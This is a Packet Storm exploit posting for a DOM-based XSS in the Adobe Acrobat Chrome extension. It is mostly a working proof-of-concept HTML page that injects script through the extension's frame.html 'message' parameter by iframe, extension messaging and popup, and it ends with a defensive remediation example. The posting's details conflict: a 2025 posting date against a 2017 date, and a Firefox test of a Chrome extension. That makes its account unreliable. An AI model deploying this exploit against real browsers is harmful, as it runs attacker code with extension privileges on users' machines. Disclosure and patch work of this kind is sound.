📄 Adobe Acrobat Chrome 1.41.100 Cross Site Scripting

🗓️ 09 Dec 2025 00:00:00 | Reported by indoushka | Type: packetstorm | 🔗 packetstorm.news | 👁 148 Views

Adobe Acrobat Chrome extension DOM XSS lets attackers run code in the extension context via unsanitized JSON data.

Code
=============================================================================================================================================
    | # Title     : Adobe Acrobat Chrome V 1.41.100 Extension DOM XSS Exploit                                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://chromewebstore.google.com/detail/adobe-acrobat-pdf-edit-co/efaidnbmnnnibpcajpcglclefindmkaj                         |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/212491/ 
    
    [+] Summary : The Adobe Acrobat Chrome extension fails to sanitize JSON-based message parameters rendered in the frame.html file. This creates a
                  DOM-based XSS condition. Malicious payloads are executed inside the extension context.
    
    [+] Date: January 2017
    
        Extension: Adobe Acrobat Chrome Extension (ID: efaidnbmnnnibpcajpcglclefindmkaj)
    
        Type: DOM-based Cross-Site Scripting (XSS)
    
        Users Affected: ~30 million installations (via forced auto-update)
    	
    [+] Technical Details:
    
    The extension receives JSON data and renders dynamic HTML without 
    proper sanitization. The vulnerable code accepts untrusted strings
    and injects them into the DOM using innerHTML.
    
    [+] Impact:
    An attacker can execute arbitrary JavaScript within the extension
    context, bypassing browser Same Origin Policy and triggering 
    extension-level privileges.
    
    [+] Exploit (PoC):
    The following sanitized PoC demonstrates the XSS trigger behavior.
    
    Steps to Reproduce:
    1. Install Adobe Acrobat Chrome Extension.
    2. Visit a crafted local HTML page.
    3. Observe execution of JavaScript inside the frame context.
    
    Save Instructions:
    Code below should be saved in `poc.html` and opened locally.
    
    Execution:
    Open `poc.html` in Chrome with the extension installed. Observe
    console logs confirming rendering inside the extension's frame.
    
    [+]  POC :	
    
    <!DOCTYPE html>
    <html>
    <head>
        <title>Adobe Acrobat XSS Exploit</title>
    </head>
    <body>
        <h2>Adobe Acrobat Extension DOM XSS Exploit</h2>
        
        <div id="exploit-container"></div>
        
        <script>
        // Extension ID and vulnerable page
        const EXTENSION_ID = 'efaidnbmnnnibpcajpcglclefindmkaj';
        const VULNERABLE_PAGE = 'data/js/frame.html';
        
        function createExploit() {
            // Advanced XSS payload with multiple vectors
            const payload = {
                panel_op: "status",
                current_status: "failure",
                message: `
                    <div style="background:red;color:white;padding:20px;">
                        <h1>XSS EXECUTED</h1>
                        <p>Domain: <script>document.write(document.domain)</script></p>
                        <svg/onload="alert('POC By Indoushka: ' + location.href)">
                    </div>
                    <iframe src="javascript:alert('iframe js')" style="display:none"></iframe>
                `.replace(/\n/g, ' ').trim()
            };
            
            // URL encode the payload
            const encodedPayload = encodeURIComponent(JSON.stringify(payload));
            const exploitUrl = `chrome-extension://${EXTENSION_ID}/${VULNERABLE_PAGE}?message=${encodedPayload}`;
            
            return exploitUrl;
        }
        
        function executeExploit() {
            const exploitUrl = createExploit();
            
            // Method 1: Try with iframe sandbox bypass
            const iframe = document.createElement('iframe');
            iframe.sandbox = 'allow-scripts allow-same-origin';
            iframe.src = exploitUrl;
            iframe.style.width = "500px";
            iframe.style.height = "400px";
            iframe.style.border = "3px solid red";
            
            document.getElementById('exploit-container').appendChild(iframe);
            
            console.log('Exploit URL:', exploitUrl);
            
            // Method 2: Try to trigger via extension messaging
            setTimeout(() => {
                try {
                    // Try to communicate with the extension
                    chrome.runtime.sendMessage(EXTENSION_ID, { 
                        type: 'trefoil_html_convert',
                        data: payload 
                    }, response => {
                        console.log('Extension response:', response);
                    });
                } catch(e) {
                    console.log('Direct messaging failed:', e.message);
                }
            }, 1000);
            
            // Method 3: Create a popup with user gesture
            document.body.onclick = function() {
                window.open(exploitUrl, '_blank', 'width=600,height=400');
            };
        }
        
        // Execute exploit after page load
        window.onload = executeExploit;
        
        // Alternative: Use button with user gesture
        document.body.innerHTML += `
            <button onclick="window.open('${createExploit()}', '_blank', 'width=600,height=400')">
                Click to Trigger Exploit (User Gesture Required)
            </button>
        `;
        </script>
    </body>
    </html>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
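
The remediation for the pattern described under Technical Details, as an added example that is not the extension's code and not part of the original advisory: the `message` JSON is validated against an allowlist and written with `textContent` instead of `innerHTML`. Field names come from the PoC payload above; the function names, the allowed status values other than `failure`, and the length cap are assumptions.

```javascript
// Added example, not Adobe's code. Field names are taken from the PoC payload;
// allowed values other than "status"/"failure" and the length cap are assumptions.
const ALLOWED_OPS = new Set(["status"]);
const ALLOWED_STATUS = new Set(["success", "failure", "waiting"]);
const MAX_MESSAGE_LEN = 200;

// Vulnerable pattern from the advisory, shown for contrast and never called here:
// the untrusted string is parsed as HTML, so any markup in it becomes live DOM.
function renderStatusUnsafe(el, msg) {
    el.innerHTML = msg.message;
}

// Parse ?message=<json> and return a validated copy, or null if anything is off.
function parseStatusMessage(search) {
    const raw = new URLSearchParams(search).get("message");
    if (raw === null) return null;
    let msg;
    try { msg = JSON.parse(raw); } catch (e) { return null; }
    if (msg === null || typeof msg !== "object" || Array.isArray(msg)) return null;
    if (!ALLOWED_OPS.has(msg.panel_op)) return null;
    if (!ALLOWED_STATUS.has(msg.current_status)) return null;
    if (typeof msg.message !== "string") return null;
    if (msg.message.length > MAX_MESSAGE_LEN) return null;
    return { panel_op: msg.panel_op, current_status: msg.current_status,
             message: msg.message };
}

// Safe sink: textContent never parses markup, so tags render as literal text.
function renderStatusSafe(el, msg) {
    el.className = "status-" + msg.current_status; // allowlisted value only
    el.textContent = msg.message;
}

// Entry point a page like frame.html would call with location.search.
function handleFrameLoad(el, search) {
    const msg = parseStatusMessage(search);
    if (msg === null) { el.textContent = ""; return false; }
    renderStatusSafe(el, msg);
    return true;
}

// Constructed sample input with harmless markup in `message`.
const sampleSearch = "?message=" + encodeURIComponent(JSON.stringify({
    panel_op: "status", current_status: "failure",
    message: "<b>Conversion failed</b>"
}));
```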
